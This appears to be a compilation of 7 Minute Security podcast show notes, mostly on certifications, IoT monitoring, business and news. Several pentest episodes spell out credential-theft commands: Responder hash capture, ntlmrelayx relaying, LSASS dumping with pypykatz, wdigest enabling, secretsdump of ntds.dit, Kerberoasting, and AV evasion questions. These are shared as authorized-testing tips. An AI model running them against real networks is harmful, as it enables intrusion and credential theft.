Yay - I'm a PCIP now! I welcome you to check out our past episodes on PCIP, but in some ways this will be the be all, end all episode on the topic. Today I cover: Study materials that helped me prepare: PCIP book by Linda Jones (I couldn't actually get this one in time but it looks awesome!) Flashcards from Cram Flashcards from Quizlet My flashcards from Quizlet (I'll need to sanitize these and give you the password. Contact me if interested) Flashcards from ProProfs Documentation from PCI Web site itself - specifically the glossary, quick reference guide and my personal favorite, the prioritized approach guidance I also talk about taking the exam from home which was an interesting experience (as well as a privacy/security mini nightmare!).

Hello! This episode is a true homecoming in that I actually recorded it from home. Yay! WARNING!!! WARNING!!! This episode contains a ton of singing. If you don't like singing, do not listen!!! With that said, I wanted to follow up on part 1 and 2 of this series and share some additional cool tools that others have told me about in regards to securing and monitoring all your ioTs! Home Assistant - is described on its Wikipedia page as "a free and open-source home automation software designed to be the central control system in a smart home or smart house." You can quickly grab the HA image and dump it on an SD card with Balena Etcher and be up and running in minutes. I found HA a bit overkill/complicated for my needs, but my pal Hackernovice (on 7MS Slack) says this video demonstrates why he really loves it. Prometheus, recommended by our pal Mojodojo101, is "a systems and service monitoring system. It collects metrics from configured targets at given intervals, evaluates rule expressions, displays the results, and can trigger alerts if some condition is observed to be true." I found a great RPi install guide that will help you get it up and running in a snap. I love the capabilitiesand possibilities of Prometheus, but much like Home Assistant, it quickly got to "more than I need" territory. The final thing we talk about today is trying to answer this question: with so many of my ioTs tied to some cloud app/service, how do I keep these accounts themselves as secure as possible? Songs sung in this episode include: Follow Through by Gavin DeGraw Livin' on a Prayer The Look that Says You Love Me (Brian Johnson) Goodness of God

Hey, hope you're having a great week! The last few weeks have had somewhat of a homecoming and home cleaning theme. To continue that train of thought, over the last few days I've gotten heavy into cleaning up my cloud clutter - cloud services, email, file sharing, etc. - in an effort to be more secure and have a reduced digital footprint. Today's tips include: Double-check that any device you have that supports full-disk encryption has it enabled On all your machines, clean up old straggler artifacts in C:, desktop folder, downloads folder, etc. Use the nifty built in tools for Windows 10 to free up even more disk space (I just learned about this one recently - Windirstat and Treesizefree were my go-tos for years) Got old PCs sitting around you're not using? Nuke 'em with DBAN. Go into your password vault and clean out creds for services you don't use anymore (especially for old client projects!) Purge your file share services (Dropbox, OneDrive, etc. on a regular basis), and/or bring older archives over to cold (on-site) encrypted storage Review your "bottleneck" accounts (key email accounts, for example) and review the devices/services linked to them - clean up and purge regularly Handling password hashes? Here's one way to setup an encrypted partition for them You can clean old email from Gmail quickly using some simple searches. You can also use Google Takeout to download offline copies of mail and then browse them later with Thunderbird  

Hi again! It's sort of fun to release two episodes in one week for a change. If you missed part 1 on our ioT security series, check it out here. Today we dive into some free/cheap monitoring solutions you can use to keep tabs on your ioT network (or any network, really): Nagios - it's old school but gets the job done. This article helped me get it going on an RPi. SolarWinds IP monitor - it was quick and easy to get up and running, but the 40 monitors you're allotted get burned up pretty quick if you have a decent number of devices to monitor PRTG - this is the winner in my book. It has a generous amount of monitors, quick/easy install, and a native mobile app!

WE'RE HOME! After almost a year after our fire, we're back, baby! This episode is somewhat of a homecoming that dovetails into an episode about ioT security. I've basically done a 180 degree spin on ioT stuff. I now love the coolness and convenience of these things while simultaneously being terrified of the security risks. Is there a happy balance somewhere between the two? Maybe. Today we dive into ioT security, specifically: Setting up a ioT dedicated wireless network Quarantining it so it can only talk to the Internet Poking holes in the firewall to allow ioT DNS requests to be captured Scanning your ioT for services and potential default/weak cred use

Hi! Today our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax has prepared some cyber-licious actionable news stories for us to chew on. Today's stories include: Cybersecurity skills gap (powered by lack of career development!) Which cyber jobs are hot - or not? Mysterious wave of DDoS attacks The Magecart threat group pwns thousands of ecommerce sites On a parting note, don't forget to patch your DCs against Zerologon! Here's a great Twitter thread breakdown that explains it in more detail

Yay! It's time for another tale of pentest pwnage! Highlights include: Making sure you take multiple rounds of "dumps" to get all the delicious local admin creds. Why lsassy is my new best friend. I gave a try to using a Ubuntu box instead of Kali as my attacking system for this test. I had pretty good results. Here's my script to quickly give Ubuntu a Kali-like flair: sudo apt-get update sudo apt-get upgrade -y sudo apt-get install openssh-server -y sudo apt-get install nmap curl dnsrecon git net-tools open-vm-tools-desktop python3.8 python3-pip unzip wget xsltproc -y #Aha helps take output from testssl.sh and make it nice and HTML-y sudo git clone https://github.com/theZiz/aha.git /opt/aha #Awesome-nmap-grep makes it easy to grep nmap exports for just the data you need! sudo git clone https://github.com/leonjza/awesome-nmap-grep.git /opt/awesome-nmap-grep #bpatty is...well...bpatty! sudo git clone https://github.com/braimee/bpatty.git /opt/bpatty #CrackMapExec is...awesome sudo mkdir /opt/cme cd /opt/cme sudo curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.1.0dev/cme-ubuntu-latest.1.zip -L -o cme.zip sudo unzip cme.zip sudo chmod +x ./cme #eyewitness is a nice recon tool for putting some great visualization behind nmap scans sudo git clone https://github.com/FortyNorthSecurity/EyeWitness.git /opt/eyewitness cd /opt/eyewitness/Python/setup sudo ./setup.sh #impacket is "a collection of Python classes for working with network protocols" #I currently primarily use it for ntlmrelayx.py sudo git clone https://github.com/CoreSecurity/impacket.git /opt/impacket cd /opt/impacket sudo pip3 install . #mitm6 is a way to tinker with ip6 and get around some ip4-level protections sudo git clone https://github.com/fox-it/mitm6.git /opt/mitm6 cd /opt/mitm6 sudo pip3 install -r requirements.txt # install service-identity sudo pip3 install service-identity # lsassy sudo python3 -m pip install lsassy #nmap-bootstrap-xsl turns nmap scan output into pretty HTML sudo git clone https://github.com/honze-net/nmap-bootstrap-xsl.git /opt/nmap-bootstrap-xsl #netcreds "Sniffs sensitive data from interface or pcap" sudo git clone https://github.com/DanMcInerney/net-creds /opt/netcreds #PCCredz parses pcaps for sensitive data sudo git clone https://github.com/lgandx/PCredz /opt/pcredz #Powersploit is "a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment" sudo git clone https://github.com/PowerShellMafia/PowerSploit.git /opt/powersploit #PowerupSQL is a tool for discovering, enumerating and potentially pwning SQL servers! sudo git clone https://github.com/NetSPI/PowerUpSQL.git /opt/powerupsql #responder is awesome for LLMNR, NBT-NS and MDNS poisoning sudo git clone https://github.com/lgandx/Responder.git /opt/responder

Today we're talking business! We've got some exciting news and updates to share with you since we last did a "crying" episode last fall: 7MS hired a VP of sales and marketing: Clyde Cooper! We've added some new tools to our tools/services gist: Having a true sales force for the first time has prompted us to invest in Salesforce. There are a few gotchas with signing up for a Salesforce trial and then migrating to a paid plan (discussed more in today's episode) We're trying to "eat our own dog food" and part of that includes good inventory management. For that we've started to play with Rumble and reaaaaaaaaaaalllly like it Recording an "about us" video with a production company is exciting, stressful and awkward Today I met the guy who wins the Internet (or at least LinkedIn) - he sent me a personalized video with an idea I'm definitely going to steal for future marketing initiatives For really no reason at all, I sing for you a bit in this episode On that note, I absolutely love this song. I feel like it's my family's theme song for the last year.

Today we're thrilled to have our friend and PlexTrac CEO Dan DeCloss back to the program! (P.S. PlexTrac is launching runbooks as a feature - and you should definitely check out PlexTrac's upcoming Webinar about runbooks on September 9!). We also did a PlexTrac 101 Webinar with them recently! You may remember Dan from such podcasts as this one when we first talked to him in 2019. Dan and I have a lot in common in that we both started security companies about the same time, so I had a lot of questions for Dan around how business has been going since we last talked on the podcast. Today our topics/questions include: What are the (good) warning signs that a passion project you have could be a viable business? Why "having all the jobs there has ever been" is a great way to figure out it's time to start your own business :-) At what point does a side project have to become what you do for your day job? How do you safely prepare to quit a comfortable corporate life to life as a small biz owner? Do you go 100% on faith? Do you save your $ for a year so you can "float" your business for a while? Some combination of the two? How important is it to have the support of your friends/family when starting a new biz? Once you start a biz what are the best/worst things about wearing all the hats (engineering, sales, marketing, accounting, HR, etc.)? When is it time to hire additional resources or raise additional money to support your growing business? What marketing efforts are fruitful for a new security biz to spend time/money on? How do you decide what bells/whistles to add to PlexTrac? Follow your own roadmap? Let the customers drive your direction? Some combo of both? What new bells and whistles are coming to PlexTrac in the Webinar on September 9?! (Spoiler alert: RUNBOOKS!)

Hola! We're back again with our amigo Joe "The Machine" Skeen (a.k.a. Gh0sthax) who has prepared some awesome and actionable news stories for us to digest. Today's stories include: The Twitter hack that promised free Bitcoin for everybody - with good coverage by Krebs and Threatpost Garmin's personal and painful experience with ransomware Joe offers 7 tips any org can use to reduce their likelihood of getting pwned with an attack or ransomware Are we ready to endure a cyber crisis? Would you fall for this social engineering attack?

Welcome to another fun tale of internal pentest pwnage! Today's tale includes these helpful informational tidbits: My understanding is that in order for mitm6 relay attacks to work against DCs, those DCs have to have LDAPS config'd properly. Use nmap -sV -p646 name.of.domain.controller to verify this (thanks this site for the tip!) PowerView is awesome when used with Find-InterestingDomainShareFile to find interesting files with the word password or sensitive or other helpful strings. eavesarp helped me identify some weird hosts on weird subnets sending regular bursts of traffic to "interesting" hosts! Check out this video from Black Hills Infosec to learn more. I've also got some personal updates for you, including: House updates Fighting with the man/woman upstairs My worst Webinar nightmare came true A socially distanced wedding singing experience

Today we're thrilled to welcome Ameesh Divatia from Baffle back to the program. We first met Ameesh back in episode 349 and today he's back to discuss a slew of additional hot security topics, including: Misconfigured cloud databases Why is this such a common issue, and how can we address it? Wait wait wait...I just spun up a machine in Azure, AWS, Digital Ocean, etc. Isn't it secure because....it's the cloud? What tools can we use to better secure our cloud databases? How can we secure sensitive information as we migrate it from LAN side to the cloud? CCPA (California Consumer Privacy Act) What is the CCPA? How does it relate to GDPR? If I'm a Californian, what can I demand to know from companies as far as how they're using my data? What can't I demand to know? Will CCPA inspire folks to scrub their data from the hands of big companies and go more "off the grid?" Does CCPA only apply to California residents and companies? Secure data sharing What are the current challenges with secure data sharing in terms of monitoring the flow of data within their systems and their partners’ systems, while addressing privacy concerns? What are some of the common mistakes companies make when sharing sensitive data internally or with partners/clients? What is Secure Multiparty Compute (SMPC) and how can it help with secure data sharing?

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. First and foremost, I have to say that 7 Minute Security's official stance on toads is that nobody should be licking them at any time, for any reason. Also, I can neither confirm nor deny that toads can catch coronavirus. Listen to today's episode...it'll make more sense. We've got another swell tale of internal pentest pwnage for you today! Highlights include: If you've collected a ton of hashes with Responder, the included DumpHash.py gives you a lovely organized list of collected hashes! Here's one way you can grab the latest CME binary: curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip Note to self: I must've been using outdated CME forever, because the correct syntax to get the wdigest flag is now a little different: cme smb HOST -u localadmin -H "hash" --local-auth -M wdigest -o ACTION=enable If you're looking to block IPv6 (ab)use in your environment, this article has some great tips. When testing in an environment with a finely tuned SIEM, I highly recommend you download all the Kali updates and tools ahead of time, as sometimes just the call out to kali.org gets flagged and alerted on to the security team Before using the full hatecrack methodology, I like to run hashes straight through the list of PwnedPasswords from hashes.org (which appears to currently be offline) first to give the org an idea as to what users are using easy-to-pwn passwords. A question for YOU reading this: what's the best way to do an LSASS dump remotely without triggering AV? I can't get any of the popular methods to work. So pypykatz is my go-to. I learned that PowerView is awesome for finding attractive shares! Run it with Find-InterestingDomainShareFile to find, well, interesting files! Files with password or sensitive or admin in the title - and much more! Got to use PowerUpSQL to audit some MS SQL sauce, and I found this presentation (specifically slide ~19) really helpful in locating servers I could log into and any SQL vulnerabilities the boxes were ripe for.

Today's episode is all about creating and deploying your own pentest dropbox! In part 1 I talked about some "gotchas" but this time around I'm ready to dump a whole slug of specific and updated tips on ya! Below are the tips covered in this episode that are better read than said: For the Windows VM Turn on RDP with PowerShell: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0 Enable-NetFirewallRule -DisplayGroup "Remote Desktop" Change time zone with command line: tzutil /s "Central Standard Time" Install Chrome with PowerShell: $LocalTempDir = $env:TEMP; $ChromeInstaller = "ChromeInstaller.exe"; (new-object System.Net.WebClient).DownloadFile('http://dl.google.com/chrome/install/375.126/chrome_installer.exe', "$LocalTempDir\$ChromeInstaller"); & "$LocalTempDir\$ChromeInstaller" /silent /install; $Process2Monitor = "ChromeInstaller"; Do { $ProcessesFound = Get-Process | ?{$Process2Monitor -contains $_.Name} | Select-Object -ExpandProperty Name; If ($ProcessesFound) { "Still running: $($ProcessesFound -join ', ')" | Write-Host; Start-Sleep -Seconds 2 } else { rm "$LocalTempDir\$ChromeInstaller" -ErrorAction SilentlyContinue -Verbose } } Until (!$ProcessesFound) Install PowerUpSQL: Install-Module -Name PowerUpSQL Turn off sleepy time: powercfg.exe -change -standby-timeout-ac 0 Install DotNet 3.5: dism /online /Enable-Feature /FeatureName:"NetFx3" For the Kali VM Refresh the SSH keys: apt install openssh-server -y mkdir /etc/ssh/default_keys mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/ dpkg-reconfigure openssh-server systemctl enable ssh.service systemctl start ssh.service Get SharpHound and Mimikatz: wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200519/mimikatz_trunk.zip wget https://github.com/BloodHoundAD/BloodHound/raw/master/Ingestors/SharpHound.exe Install pypykatz sudo pip3 install pypykatz Install CrackMapExec binaries (which at time of this publication is this one): curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip

Hello! We're back with our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax) who has prepared some awesome and actionable news stories for us to digest. Today's stories include: Hackers are trying to steal admin passwords from F5 devices Secret service reports increase in hacked MSPs Most Popular Home Routers Have ‘Critical’ Flaws "Sigred" DNS vulnerability in Microsoft DNS

This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows: Responder.py -i eth0 -rPv is AWESOME. It can make the network rain hashes like manna from heaven! Testing the egress firewall is easy with this script. Consider this SANS article for guidance on ports to lock down. Testing for MS14-025 is easy with this site. mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article. It's especially handy/focused when you create a targets.txt that looks something like this: smb://CORP\Administrator@192.168.195.2 smb://CORP\Administrator@192.168.195.3 smb://CORP\brian.admin@192.168.195.7 192.168.195.7 192.168.195.10 Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support. From there, once you get active socks connections, you can connect to them directly with a full interactive shell with something like proxychains smbclient //192.168.195.2/ -U CORP/brian.admin I ran into a weird issue with CrackMapExec where the --local-auth flag didn't seem to be working so I ended up trying the binary version and then it worked like a champ! Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done. Wanna spin up a quick SMB share from your Kali box? Try smbserver.py -smb2support share /share Then, once you've pulled back the lsass.dmp file, you can rip through it easily with: pip3 install pypykatz sudo pypykatz lsa minidump lsass.dmp > lsass.txt Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to much on!

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit [safepass.me](https://safepass.me/?7ms422 for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today's episode continues the work we started in episode #419. We talk about the importance of having a good foundation of security documentation - including a reading out of the following policies: Acceptable use Data protection and privacy

Today my pal Gh0sthax and I pick apart the Verizon Data Breach Investigations Report and help you turn it into actionable items so you can better defend your network! I'm especially excited because today's episode marks two important 7MS firsts: The episode has been crafted by a professional podcast producer The episode has been transcribed by a professional transcription service

Today's episode is a fun tale of pentest pwnage! Interestingly, to me this pentest had a ton of time-sponging issues on the front end, but the TTDA (Time to Domain Admin) was maybe my fastest ever. I had to actually roll a fresh Kali VM to upload to the customer site, and I learned (the hard way) to make that VM disk as lean as possible. I got away with a 15 gig drive, and the OS+tools+updates took up about 12 gig. One of the biggest lessons I learned from this experience is to make sure that not only is your Kali box updated before you take it to a customer site (see this script), but you should make sure you install all the tool dependencies beforehand as well (specifically, Eyewitness, Impacket and MITM6). This pentest was also extremely time-boxed, so I tried to get as much bang out of it as possible. This included: Capturing hashes with Responder Checking for "Kerberoastable" accounts (GetUserSPNs.py -request -dc-ip x.x.x.x domain/user) Check for MS14-025 (see this article) Check for MS17-010 (nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24 -oA vulnerable-2-eblue) and try this method of exploiting it Check for DNS zone transfer (dnsrecon -d name.of.fqdn -t axf) Test for egress filtering of ports 1-1024 Took a backup of AD "the Microsoft way" and then cracked with secretsdump: sudo python ./secretsdump.py -ntds /loot/Active\ Directory/ntds.dit -system /loot/registry/SYSTEM -hashes lmhash:nthash LOCAL -outputfile /loot/ad-pw-dump

Today we're talking about eating the security dog food! What do I mean by that? Well, a lot of security companies I worked for in the past preached to clients about the importance of having a good security program, but didn't have one of their own! I'm trying to break that pattern now that I'm in a position to lead an information security program for 7MS. In today's episode we talk about getting your company started with a good set of infosec policies/procedures. First up is a "mothership" infosec policy with the following sub-policies inside it: Acceptable Use Data Protection and Privacy Physical Security Tools and Technology Training and Awareness Reporting Oh, and the song I jazz/scat/sang coming out of the jingle was If I Were a Dog

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today's episode is all about mental health! I talk about some of my challenges with stress/anxiety and how I finally put on my big boy pants, dropped some misconceptions and decided to do something about it. Additionally, this episode contains references to: Jon Secada Arsenio Hall Lone Wolf McQuade

Today's episode is all about getting the most value out of your vulnerability scans, including: Why, IMHO you should only do credentialed scans Policy tweaks that will keep servers from tipping over and printers from printing novels of gibberish ;-) How to make your scan report more actionable and less unruly Turning up logging to 11 (use with caution!) A small tweak to an external scan policy that can result in the difference between a successful or failed scan The nessusd.rules file is awesome for excluding specific hosts and services from your scans

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Today we're talking about some of my favorite features of Pi-hole 5.0. Including: WARNING! WARNING! Upgrading from 4.x is a one-way operation! Per-client blocking (you can setup, for example, a group machines called "kids" and apply specific domain block/allow lists and domains to them) More granular detail (especially if there are issues) when blocklists get updated Better, richer debug log output I also talk about a great companion for yor Pi-hole: a command-line Internet speed test! Hat tip to Javali over at the 7MS forums who told me about this. Additionally, I briefly mention "Hashy" (the nickname of my password cracking rig), give you some stay-at-home streaming TV show recommendations, and give you a quick house rebuild update!

Today's episode kicks off a fun little experiment where my pal Joe Skeen and I cover some of the week's interesting security news stories, how they might affect you, and what you can do to make you and your company more secure. This week's stories: Salt stack RCE (Daily Swig / Cyber Scoop) Malware uses Corporate MDM as attack vector (Checkpoint) Critical vulns in Sharefile (Citrix) Shareholders sue Labcorp over their 'persistent' failure to secure data (Cyberscoop)

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today I'm excited to share more tales of pentest FAIL with you. Today's tales include: Accidentally scanning assets that belong to an agency that nobody should be messing with Delivering reports with vulnerabilities from somebody else's network Why it's important to write a report more than 15 minutes before delivery Lessons learned from firing a disgruntled employee

Hey everybody! I hope you're hanging in there during quarantine and staying healthy. Today is part 3 of our ongoing series all about becoming a PCIP. The good news is I'm finally, actually registered for the cert and have started diving into the training! So in today's episode I want to regurgitate some of what I'm learning to whet your appetite (or not) for this particular certification. Specifically, we cover: The overview and objectives for being a PCIP (TLDR: PCIP does NOT replace QSA or ISA, but gives us a good understanding of how to protect payment card data) How and why payment card data is leaked/stolen/breached - and then sold/monetized The definition of some fundamental PCI acronym soup, including PCI DSS, PA-DSS and P2PE

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. In today's episode we share some tips for working more safely and securely from home, which for many of us is our new office for the foreseeable future! Specifically, we cover: Picking powerful passwords Locking down your wifi Defending your digital identity Protecting your PC Blocking icky stuff in your browser Composing careful conference calls Clicking links carefully I've also made this episode available in long-form blog here. Please feel free to share with anybody you think could benefit from the info!

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today is sort of a continuation of episode 407 where we covered four fun stay-at-home security projects including FoldingAtHome building a headless pi-hole, redoing your network with a Dream Machine, and enjoing some music via Zoom by way of Q.U.A.C.K. In this episode, we cover: Pentester Academy is awesome and currently has a steal of a deal if you're looking to score a membership on the cheap! CompTIA caught my eye because they're offering 20% off certain tests/bundles with coupon code earthday2020. Personally I'm this close to pulling the trigger on this CompTIA Cloud+ bundle, and even better, they offer online testing during this stay-at-home time! Pi-Holes are a free and awesome way to keep ads and other garbage off your network. Additionally, I give you 100 extra nerd points if you enable DNSSSEC. Just make sure your date/time settings on the box is correct, otherwise DNS will be pretty broken. I discuss a fix here on the 7MS forums.... Read more at 7ms.us!

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. I’m gonna love you like coronavirus, I don’t know what else to say I’m gonna love you like coronavirus, I’m gonna stand 6 feet away Yes our love was meant to be, but it will have to wait until later Cuz I don’t wanna end up hooked up to a ventilator In today's episode I continue sharing my journey about becoming a PCIP. Spoiler alert: I'm still applying to even start training to be one. Here's what we'll cover: The pentesting requirement 11.3 from PCI that kind of boggles my brain, and some advice I got from a PCI guru that helped clear things up for me. This video also helped me better understand requirement 11.3. The super sucky couple of personal quarantine days I’ve had that include: Cocoa that tastes like mint-flavored old lady diarrhea Our fridge and freezer going ka-put Exploding drinks in my fridge A multi-thousand dollar repair on our new house that hasn’t even technically broken ground yet (!)

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today I'm starting a journey to become a PCI Professional (PCIP), and I'll be periodically updating the status of this journey on the 7MS forums. You don't need to be a QSA to get a PCIP, but you do need "2 years in IT or payments related background to have your application approved." The PCIP certification gives you (and I'm quoting from the PCI Web site): Principles of PCI DSS, PA-DSS, PCI PTS, and PCI P2PE Standards Understanding of PCI DSS requirements and intent Overview of basic payment industry terminology Understanding the transaction flow Implementing a risk-based prioritized approach Appropriate uses of compensating controls Working with third-parties and service providers How and when to use Self-Assessment Questionnaires (SAQs) Recognizing how new technologies affect the PCI (e.g. virtualization, tokenization, mobile, cloud) The test costs + exam for a non-participating organization (like 7MS) is $2,500. You also have to re-up every 3 years for $260 (yay, another thing to have to pay for regularly). In the miscellany department: Do you know someone who would enjoy a live 3-song acoustic concert? Check out my family's new ministry, Q.U.A.C.K. - Quarantined Unplugged Acoustic Concerts of Kindness. A Webinar on creating kick-butt cred-capturing phishing portals is happening on Tuesday, April 14! Register here!

This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the later, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to itpro.tv/7MS "I think of what the world could be If it did not have COVID-19 A million dreams is all it's gonna taaaaaaaaaaaaaaaake!" Today's episode is a continuation and update on the cell phone security for tweenagers episode from about a year ago. Specifically, I talk about: How the cell phone contract I put together for my tweenager kind of blew up in my face I'm the worst dad in the world because my wife and I enforced a "no screens" policy for a few weeks. We lived. Barely. Apple Screen Time is your friend, and helps put some limits on iDevice use The Dream Machine makes it easy to setup a segmented wireless network just for your kids. You can also "time box" their individual network to only broadcast at certain hours of the day You can then apply OpenDNS to filter bad sites on just the kiddo network or ALL your networks If you make a home backup/DR plan make sure it includes important stuff like: passwords to important things, as well as critical contacts like your tax prep person, financial advisor and subcontractors. More info at 7ms.us!

In today's episode I share four fun stay-at-home security projects - three with a security focus and one centered around music. Let's gooooooooo! FoldingAtHome The Folding At Home project helps use your GPU/CPU cycles for COVID-19 research. From the Web site: We need your help! Folding@home is joining researchers around the world working to better understand the 2019 Coronavirus (2019-nCoV) to accelerate the open science effort to develop new life-saving therapies. By downloading Folding@Home, you can donate your unused computational resources to the Folding@home Consortium, where researchers working to advance our understanding of the structures of potential drug targets for 2019-nCoV that could aid in the design of new therapies. The data you help us generate will be quickly and openly disseminated as part of an open science collaboration of multiple laboratories around the world, giving researchers new tools that may unlock new opportunities for developing lifesaving drugs. It's awesome! Since I run my cracking rig as a headless Linux install, I followed the advanced install and then used the command line options to run FAHClient standalone (only because personally I don't really love running extra, always-on services on any of my boxes). It looks like FAH is having a good problem in that there are more resource donors than research to number-crunch on! Keep tabs on the forums for up-to-date information. See more information at 7ms.us!

This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the later, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to itpro.tv/7MS First and foremost, I hope you all are doing well and taking care of yourselves. Today's episode focuses on disasters, which is unfortunately a very appropriate topic. As a quick refresher, our family had a fire a few months ago. It sucked. I talked about the day of the fire in this episode then did a "how do we get back on the grid?" episode here and then answered some of your FAQs here. Regardless of if your DR plan includes fires, virus outbreaks, tornados or zombie attacks, it's important to have a solid plan for your family and business. So in today's episode I cover these main two topics: A DIY $500 NAS + Unlimited Cloud Backup Plan In trying to be more organized with my backup strategy, I set out to create a new backup plan with the following criteria: Priced at ~$500 One on-prem array Encrypted at rest Backs up to cloud with encryption key I control Unlimited scalable storage I found my solution using this awesome video but I need to warn you about something right off the bat: the config in this video and in today's episode is not supported by CrashPlan because CP doesn't have a native backup agent that will run on the Synology NAS (at the time of this writing, anyway). With that said, here's the grocey list of things that make up my backup rig: (See more info on the show notes for todya's episode at 7ms.us)

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Today's episode of pentest pwnage is the (hopefully) exciting conclusion to this episode. Last we left this pentest, we ran into some excellent blue team defenses, including: MFA on internal servers (which we bypassed) Strong passwords Limited vulnerable protocols (LLMNR/Netbios/etc) available to abuse for cred-capturing Servers that were heavily firewalled off from talking SMB to just any ol' subnet nor the Interwebs (here's a great video on how to fine-tune your software firewall chops) In today's episode we talk about: How maybe it's not a good idea to make computer go completely "shields down" during pentests Being careful not to fat-finger anything when you spawn cmd.exe with creds, like runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe" Being careful not to fat-finger anything when using CrackMapExec How fundamental and really effective blue team controls (such as the ones mentioned above) can really make pentesting a headache! How you should be careful when spawning shells with MultiRelay (part of Responder is it creates new services on your victim machine Has the 7MS podcast helped you in your IT and security career? Please consider supporting us!

Today's slightly off-topic episode kicks off a new tag called 7MOOMAMA. That stands for 7 Minutes of Only Music and Miscellaneous Awesomeness. To kick things off, I'm super excited to share with you two new security-themed songs for some of my favorite security things! They are: Backdoors and Breaches - my favorite incident response card game. OWASP Juice Shop - my favorite vulnerable Web application. Enjoy! Backdoors and Breaches Backdoors and Breaches I love the way teaches me to think about security controls And their proper placement Backdoors and Breaches I can’t wait to blow my paycheck just to get myself a game deck and then move Out of my mother’s basement Soon I’ll be sittin’ down and playing it with my red and blue teams Or John and gang at Black Hills Info Security And when I go to bed tonight I know what’s gonna fill my dreams Backdoors and Breaches Juice Shop VERSE 1 When you want to shop online then you had better be sure The experience is safe and also secure Don't want to let no SQLi or cross-site scripting ruin your day No, you want to break into a joyous song and say: CHORUS 1 Juice Shop! Juice Shop! You can order tasty beverages in any quantity Juice Shop! Juice Shop! Just don't test the site with Burp Suite or you won't like what you see VERSE 2 Now if you're feeling kinda sneaky and you're inclined to explore You might find inside the Juice Shop...a hidden score board It will point you towards a vuln'rability or maybe two And when you're done you'll say, "This site should get a code review!" CHORUS 2 Juice Shop! Juice Shop! It has got more holes then a warehouse filled with gallons of Swiss cheese Juice Shop! Juice Shop! ...finish the songs at 7ms.us

Today I'm joined by Matt Duench (LinkedIn / Twitter), who has a broad background in technology and security - from traveling to over 40 countries around the world working with telecom services, to his current role at Arctic Wolf where he leads product marketing for their managed risk solution. Matt chatted with me over Skype about a wide variety of security topics, including: Corporate conversations around security have changed drastically in such a short time - specifically, security is generally no longer perceived as a cost center. So why are so many organizations basically still in security diapers as far as their maturity? Why is it still so hard to find “bad stuff” on the network? What are some common security mistakes you wish you could wave a magic wand and fix for all companies? The beauty of the CIS Top 20 and how following even the top 5 controls can stop 85% of attacks. Low-hanging hacker fruit that all organizations should consider addressing, such as: Disabling IPv6 Using a password manager Turning on multi-factor authentication Don’t write down your passwords! Have a mail transport rule that marks external mail as “EXTERNAL” so it jumps out to people Consider an additional rule to stop display name spoofing (h/t to Rob on Slack!) Why you should be concerned about corporate account takeover, and how to better protect yourself and your company against this attack vector I also asked Matt a slew of questions that many of you submitted via Slack: More info under the show notes for this episode at 7ms.us!

